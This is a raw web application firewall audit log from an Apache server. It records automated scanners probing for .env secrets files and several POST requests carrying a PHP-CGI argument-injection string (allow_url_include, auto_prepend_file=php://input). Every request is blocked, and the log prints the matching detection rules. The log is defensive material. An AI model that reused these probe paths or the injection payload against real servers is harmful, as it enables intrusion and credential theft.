Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745669842401195 6203 (- - -)
Stopwatch2: 1745669842401195 6203; combined=4472, p1=523, p2=3699, p3=32, p4=35, p5=106, sr=80, sw=77, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d64dc016-Z--
--44c94938-A--
[26/Apr/2025:20:10:30 +0700] aAzbRtDEbIDiBZnoTx5n0QAAAEM 103.236.140.4 55610 103.236.140.4 8181
--44c94938-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.88.89
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.88.89
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G965U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
Accept-Charset: utf-8
--44c94938-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--44c94938-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745673030904306 808 (- - -)
Stopwatch2: 1745673030904306 808; combined=334, p1=295, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--44c94938-Z--
--dec4b77c-A--
[26/Apr/2025:20:10:50 +0700] aAzbWtDEbIDiBZnoTx5n4wAAAFM 103.236.140.4 55694 103.236.140.4 8181
--dec4b77c-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.88.89
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.88.89
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; Z971) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36
Accept-Charset: utf-8
--dec4b77c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--dec4b77c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745673050750462 748 (- - -)
Stopwatch2: 1745673050750462 748; combined=292, p1=258, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--dec4b77c-Z--
--c5982f3b-A--
[26/Apr/2025:20:42:37 +0700] aAzizU3IXD9XJ6lrmIUOEAAAAAQ 103.236.140.4 41182 103.236.140.4 8181
--c5982f3b-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 44.220.175.104
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 44.220.175.104
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--c5982f3b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c5982f3b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745674957032632 743 (- - -)
Stopwatch2: 1745674957032632 743; combined=290, p1=256, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c5982f3b-Z--
--3e0d363b-A--
[26/Apr/2025:20:42:37 +0700] aAzizdQ6lpQjDvc0F_PQXAAAAMo 103.236.140.4 41188 103.236.140.4 8181
--3e0d363b-B--
GET /.env.prod HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 44.220.175.104
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 44.220.175.104
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--3e0d363b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3e0d363b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745674957498088 725 (- - -)
Stopwatch2: 1745674957498088 725; combined=315, p1=278, p2=0, p3=0, p4=0, p5=36, sr=63, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3e0d363b-Z--
--a4554e51-A--
[26/Apr/2025:20:42:37 +0700] aAzizdDEbIDiBZnoTx5r8AAAAFE 103.236.140.4 41190 103.236.140.4 8181
--a4554e51-B--
GET /.env.bak HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 44.220.175.104
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 44.220.175.104
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--a4554e51-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a4554e51-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745674957781080 648 (- - -)
Stopwatch2: 1745674957781080 648; combined=272, p1=242, p2=0, p3=0, p4=0, p5=30, sr=86, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a4554e51-Z--
--046c744f-A--
[26/Apr/2025:20:42:37 +0700] aAzizdDEbIDiBZnoTx5r8QAAAEk 103.236.140.4 41192 103.236.140.4 8181
--046c744f-B--
GET /.env.save HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 44.220.175.104
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 44.220.175.104
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--046c744f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--046c744f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745674957878843 671 (- - -)
Stopwatch2: 1745674957878843 671; combined=276, p1=226, p2=0, p3=0, p4=0, p5=50, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--046c744f-Z--
--d60b6e6d-A--
[26/Apr/2025:20:42:37 +0700] aAzizU3IXD9XJ6lrmIUOEQAAABU 103.236.140.4 41194 103.236.140.4 8181
--d60b6e6d-B--
GET /.env.old HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 44.220.175.104
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 44.220.175.104
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--d60b6e6d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d60b6e6d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745674957984066 641 (- - -)
Stopwatch2: 1745674957984066 641; combined=263, p1=236, p2=0, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d60b6e6d-Z--
--cfca1f52-A--
[26/Apr/2025:20:42:38 +0700] aAziztQ6lpQjDvc0F_PQXQAAAMw 103.236.140.4 41196 103.236.140.4 8181
--cfca1f52-B--
GET /.env.development HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 44.220.175.104
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 44.220.175.104
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--cfca1f52-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--cfca1f52-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745674958124275 668 (- - -)
Stopwatch2: 1745674958124275 668; combined=263, p1=224, p2=0, p3=0, p4=0, p5=39, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--cfca1f52-Z--
--0f69e832-A--
[26/Apr/2025:20:42:38 +0700] aAziztQ6lpQjDvc0F_PQXwAAANM 103.236.140.4 41202 103.236.140.4 8181
--0f69e832-B--
GET /.env.production HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 44.220.175.104
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 44.220.175.104
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--0f69e832-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0f69e832-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745674958443602 783 (- - -)
Stopwatch2: 1745674958443602 783; combined=325, p1=285, p2=0, p3=0, p4=0, p5=39, sr=74, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0f69e832-Z--
--29887459-A--
[26/Apr/2025:20:42:38 +0700] aAziznGCMLWH05JCdxxAQwAAAIY 103.236.140.4 41204 103.236.140.4 8181
--29887459-B--
GET /website/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 44.220.175.104
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 44.220.175.104
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--29887459-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--29887459-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745674958643407 932 (- - -)
Stopwatch2: 1745674958643407 932; combined=350, p1=302, p2=0, p3=0, p4=0, p5=48, sr=78, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--29887459-Z--
--3ada3e0e-A--
[26/Apr/2025:21:16:40 +0700] aAzqyHGCMLWH05JCdxxBpwAAAI0 103.236.140.4 49168 103.236.140.4 8181
--3ada3e0e-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 161.35.4.63
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 161.35.4.63
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--3ada3e0e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3ada3e0e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745677000034979 803 (- - -)
Stopwatch2: 1745677000034979 803; combined=370, p1=332, p2=0, p3=0, p4=0, p5=37, sr=70, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3ada3e0e-Z--
--14671f04-A--
[26/Apr/2025:22:35:44 +0700] aAz9UHGCMLWH05JCdxxF-wAAAIM 103.236.140.4 39944 103.236.140.4 8181
--14671f04-B--
GET /.env HTTP/1.0
Host: wooin.epicgamer.org
X-Real-IP: 46.101.111.185
X-Forwarded-Host: wooin.epicgamer.org
X-Forwarded-Server: wooin.epicgamer.org
X-Forwarded-For: 46.101.111.185
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--14671f04-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--14671f04-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745681744436785 858 (- - -)
Stopwatch2: 1745681744436785 858; combined=296, p1=258, p2=0, p3=0, p4=0, p5=38, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--14671f04-Z--
--73f64249-A--
[26/Apr/2025:22:57:59 +0700] aA0Ch03IXD9XJ6lrmIUWzgAAAA8 103.236.140.4 45108 103.236.140.4 8181
--73f64249-B--
POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 120.195.30.141
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 120.195.30.141
X-Forwarded-Proto: https
Connection: close
Content-Length: 221
Accept: */*
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Type: application/x-www-form-urlencoded
--73f64249-C--
--73f64249-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--73f64249-E--
--73f64249-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745683079791442 4940 (- - -)
Stopwatch2: 1745683079791442 4940; combined=3171, p1=469, p2=2663, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--73f64249-Z--
--c909737c-A--
[26/Apr/2025:22:58:58 +0700] aA0CwtDEbIDiBZnoTx5zVQAAAFA 103.236.140.4 45456 103.236.140.4 8181
--c909737c-B--
GET /.env HTTP/1.0
Host: petruk.hauganslekt.no
X-Real-IP: 147.182.149.75
X-Forwarded-Host: petruk.hauganslekt.no
X-Forwarded-Server: petruk.hauganslekt.no
X-Forwarded-For: 147.182.149.75
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--c909737c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c909737c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745683138516818 770 (- - -)
Stopwatch2: 1745683138516818 770; combined=293, p1=257, p2=0, p3=0, p4=0, p5=35, sr=75, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c909737c-Z--
--0ee8775e-A--
[27/Apr/2025:01:37:30 +0700] aA0n6k3IXD9XJ6lrmIUqGgAAAAQ 103.236.140.4 57402 103.236.140.4 8181
--0ee8775e-B--
POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 88.151.34.37
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 88.151.34.37
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Accept: */*
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Type: application/x-www-form-urlencoded
--0ee8775e-C--
--0ee8775e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0ee8775e-E--
--0ee8775e-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745692650641502 5065 (- - -)
Stopwatch2: 1745692650641502 5065; combined=4056, p1=488, p2=3535, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0ee8775e-Z--
--2840144b-A--
[27/Apr/2025:03:36:26 +0700] aA1DynGCMLWH05JCdxxfjwAAAIY 103.236.140.4 60966 103.236.140.4 8181
--2840144b-B--
POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 185.213.174.118
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 185.213.174.118
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Accept: */*
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Type: application/x-www-form-urlencoded
--2840144b-C--
--2840144b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2840144b-E--
--2840144b-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745699786288067 5206 (- - -)
Stopwatch2: 1745699786288067 5206; combined=3524, p1=540, p2=2921, p3=0, p4=0, p5=63, sr=127, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2840144b-Z--
--4624a32d-A--
[27/Apr/2025:03:46:28 +0700] aA1GJCKLpK55oNIcEw0Y6AAAAEU 103.236.140.4 35378 103.236.140.4 8181
--4624a32d-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 157.230.154.6
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 157.230.154.6
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--4624a32d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4624a32d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745700388739139 1044 (- - -)
Stopwatch2: 1745700388739139 1044; combined=439, p1=407, p2=0, p3=0, p4=0, p5=32, sr=111, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4624a32d-Z--
--85ab5858-A--
[27/Apr/2025:04:16:14 +0700] aA1NHiKLpK55oNIcEw0amgAAAE4 103.236.140.4 42190 103.236.140.4 8181
--85ab5858-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 103.139.45.163
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 103.139.45.163
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
Accept: */*
--85ab5858-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--85ab5858-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745702174829350 755 (- - -)
Stopwatch2: 1745702174829350 755; combined=312, p1=273, p2=0, p3=0, p4=0, p5=38, sr=68, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--85ab5858-Z--
--eff85831-A--
[27/Apr/2025:04:16:15 +0700] aA1NH_7FMV4FIoAOnu7FjQAAAAE 103.236.140.4 42198 103.236.140.4 8181
--eff85831-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 103.139.45.163
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 103.139.45.163
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
Accept: */*
--eff85831-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--eff85831-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745702175864969 777 (- - -)
Stopwatch2: 1745702175864969 777; combined=304, p1=268, p2=0, p3=0, p4=0, p5=35, sr=71, sw=1, l=0, gc=0
